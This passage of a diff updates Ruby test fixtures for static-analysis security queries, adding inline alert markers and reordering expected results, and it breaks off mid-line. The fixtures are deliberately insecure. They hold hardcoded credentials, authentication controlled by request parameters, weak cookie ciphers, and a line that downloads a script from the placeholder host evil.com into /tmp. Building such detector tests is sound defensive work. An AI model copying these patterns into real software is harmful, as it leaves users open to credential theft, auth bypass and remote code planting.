b/ruby/ql/test/query-tests/security/cwe-732/WeakFilePermissions.qlref @@ -1 +1,2 @@ -queries/security/cwe-732/WeakFilePermissions.ql +query: queries/security/cwe-732/WeakFilePermissions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb b/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb index 5b5604f4d783..e6993033b229 100644 --- a/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb +++ b/ruby/ql/test/query-tests/security/cwe-732/app/config/application.rb @@ -11,16 +11,16 @@ class Application < Rails::Application config.action_dispatch.encrypted_cookie_cipher = "ChaCha" # BAD: weak block encryption algorithm - config.action_dispatch.encrypted_cookie_cipher = "DES" + config.action_dispatch.encrypted_cookie_cipher = "DES" # $ Alert[rb/weak-cookie-configuration] # BAD: weak block encryption mode - config.action_dispatch.encrypted_cookie_cipher = "AES-256-ECB" + config.action_dispatch.encrypted_cookie_cipher = "AES-256-ECB" # $ Alert[rb/weak-cookie-configuration] # GOOD config.action_dispatch.use_authenticated_cookie_encryption = true # BAD: less secure block encryption mode - config.action_dispatch.use_authenticated_cookie_encryption = false + config.action_dispatch.use_authenticated_cookie_encryption = false # $ Alert[rb/weak-cookie-configuration] # GOOD config.action_dispatch.cookies_same_site_protection = :lax @@ -29,9 +29,9 @@ class Application < Rails::Application config.action_dispatch.cookies_same_site_protection = "strict" # BAD: disabling same-site protections for sending cookies - config.action_dispatch.cookies_same_site_protection = :none + config.action_dispatch.cookies_same_site_protection = :none # $ Alert[rb/weak-cookie-configuration] # BAD: not all browsers default to `lax` if unset - config.action_dispatch.cookies_same_site_protection = nil + config.action_dispatch.cookies_same_site_protection = nil # $ Alert[rb/weak-cookie-configuration] end end diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected index a3f4ecb3ae9b..4f03b055ad10 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.expected @@ -1,3 +1,15 @@ +#select +| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | +| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | +| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | +| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | +| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." | HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | +| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | +| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | edges | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | provenance | | | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | provenance | | @@ -41,15 +53,3 @@ nodes | HardcodedCredentials.rb:43:46:43:53 | password | semmle.label | password | | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | semmle.label | "abcdef123456" : String | subpaths -#select -| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | -| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | -| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | -| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." | HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | -| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | -| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref index e65b7754872d..81afcc528c80 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref @@ -1 +1,2 @@ -queries/security/cwe-798/HardcodedCredentials.ql +query: queries/security/cwe-798/HardcodedCredentials.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb index 57f05a25fdf0..c405ceb630f2 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb @@ -1,24 +1,24 @@ -def authenticate(uid, password, cert: nil) +def authenticate(uid, password, cert: nil) # $ Sink if cert != nil then # comparison with hardcoded credential - return cert == "xwjVWdfzfRlbcgKkbSfG/xSrUeHYqxPgz9WKN3Yow1o=" + return cert == "xwjVWdfzfRlbcgKkbSfG/xSrUeHYqxPgz9WKN3Yow1o=" # $ Alert end # comparison with hardcoded credential - uid == 123 and password == "X6BLgRWSAtAWG/GaHS+WGGW2K7zZFTAjJ54fGSudHJk=" + uid == 123 and password == "X6BLgRWSAtAWG/GaHS+WGGW2K7zZFTAjJ54fGSudHJk=" # $ Alert end # call with hardcoded credential as argument -authenticate(123, "4NQX/CqB5Ae98zFUmwj1DMpF7azshxSvb0Jo4gIFmIQ=") +authenticate(123, "4NQX/CqB5Ae98zFUmwj1DMpF7azshxSvb0Jo4gIFmIQ=") # $ Alert # call with hardcoded credential as argument -authenticate(456, nil, cert: "WLC17dLQ9P8YlQvqm77qplOMm5pd1q25Q2onWqu78JI=") +authenticate(456, nil, cert: "WLC17dLQ9P8YlQvqm77qplOMm5pd1q25Q2onWqu78JI=") # $ Alert # concatenation involving literal -authenticate(789, "pw:" + "ogH6qSYWGdbR/2WOGYa7eZ/tObL+GtqDPx6q37BTTRQ=") +authenticate(789, "pw:" + "ogH6qSYWGdbR/2WOGYa7eZ/tObL+GtqDPx6q37BTTRQ=") # $ Alert -pw_left = "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+ZXFj2qw6asRARTV2deAXFKkMTVOoaFYom1Q" -pw_right = "4fQuzXef4f2yow8KWvIJTA==" +pw_left = "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+ZXFj2qw6asRARTV2deAXFKkMTVOoaFYom1Q" # $ Alert +pw_right = "4fQuzXef4f2yow8KWvIJTA==" # $ Alert pw = pw_left + pw_right authenticate(999, pw) @@ -28,18 +28,18 @@ def authenticate(uid, password, cert: nil) module Passwords class KnownPasswords - def include?(passwd) + def include?(passwd) # $ Sink passwd == "foo" end end end # Call to object method -Passwords::KnownPasswords.new.include?("kdW/xVhiv6y1fQQNevDpUaq+2rfPKfh+teE/45zS7bc=") +Passwords::KnownPasswords.new.include?("kdW/xVhiv6y1fQQNevDpUaq+2rfPKfh+teE/45zS7bc=") # $ Alert # Call to unrelated method with same name (should not be flagged) "foobar".include?("foo") -def default_cred(username = "user@test.com", password = "abcdef123456") +def default_cred(username = "user@test.com", password = "abcdef123456") # $ Alert username end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected index 897e8276049f..fb60e7239398 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected @@ -1,3 +1,7 @@ +#select +| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | +| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | +| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | edges | ConditionalBypass.rb:3:5:3:9 | check | ConditionalBypass.rb:6:8:6:12 | check | provenance | | | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:3:13:3:26 | ...[...] | provenance | | @@ -20,7 +24,3 @@ nodes | ConditionalBypass.rb:25:10:25:22 | ...[...] | semmle.label | ...[...] | | ConditionalBypass.rb:27:8:27:8 | p | semmle.label | p | subpaths -#select -| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | -| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | -| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref index 9639e207d1ee..5b8e3bc44f1d 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref @@ -1 +1,2 @@ -experimental/cwe-807/ConditionalBypass.ql \ No newline at end of file +query: experimental/cwe-807/ConditionalBypass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb index 1bd45f15043f..1a6dd87ab791 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb @@ -1,9 +1,9 @@ class FooController < ActionController::Base def bad_handler1 - check = params[:check] + check = params[:check] # $ Source name = params[:name] - if check + if check # $ Alert # BAD authenticate_user! name end @@ -11,7 +11,7 @@ def bad_handler1 def bad_handler2 # BAD - login if params[:login] + login if params[:login] # $ Alert do_something_else end @@ -22,9 +22,9 @@ def bad_handler3 end def bad_handler4 - p = (params[:name] == "foo") + p = (params[:name] == "foo") # $ Source # BAD - if p + if p # $ Alert verify! end end diff --git a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected index 792b17303b10..11975de723a3 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected +++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected @@ -1,3 +1,6 @@ +#select +| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | +| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | edges | http_to_file_access.rb:3:1:3:4 | resp | http_to_file_access.rb:5:12:5:15 | resp | provenance | | | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:3:1:3:4 | resp | provenance | | @@ -13,6 +16,3 @@ nodes | http_to_file_access.rb:9:16:9:30 | ...[...] | semmle.label | ...[...] | | http_to_file_access.rb:11:18:11:23 | script | semmle.label | script | subpaths -#select -| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | -| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | diff --git a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref index 2b41f979bb58..06312044c512 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref +++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref @@ -1 +1,2 @@ -queries/security/cwe-912/HttpToFileAccess.ql \ No newline at end of file +query: queries/security/cwe-912/HttpToFileAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb index aa8ce4c46ff0..e9783c063763 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb +++ b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb @@ -1,14 +1,14 @@ require "net/http" -resp = Net::HTTP.new("evil.com").get("/script").body +resp = Net::HTTP.new("evil.com").get("/script").body # $ Source file = File.open("/tmp/script", "w") -file.write(resp) # BAD +file.write(resp) # BAD # $ Alert class ExampleController < ActionController::Base def example - script = params[:script] + script = params[:script] # $ Source file = File.open("/tmp/script", "w") - file.write(script) # BAD + file.write(script) # BAD # $ Alert end def example2 diff --git a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected index 3b23376ac8d1..f859557ffde6 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected +++ b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected @@ -1,3 +1,25 @@ +#select +| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | +| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | +| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:52:18:52:23 | call to params | this remote flow source | +| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:53:18:53:23 | call to params | this remote flow source | edges | test.rb:43:9:43:14 | call to params | test.rb:43:9:43:29 | call to require | provenance | | | test.rb:43:9:43:29 | call to require | test.rb:43:9:43:37 | call to permit! | provenance | Config | @@ -60,25 +82,3 @@ nodes | test.rb:53:18:53:23 | call to params | semmle.label | call to params | | test.rb:53:18:53:35 | call to to_unsafe_h | semmle.label | call to to_unsafe_h | subpaths -#select -| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| 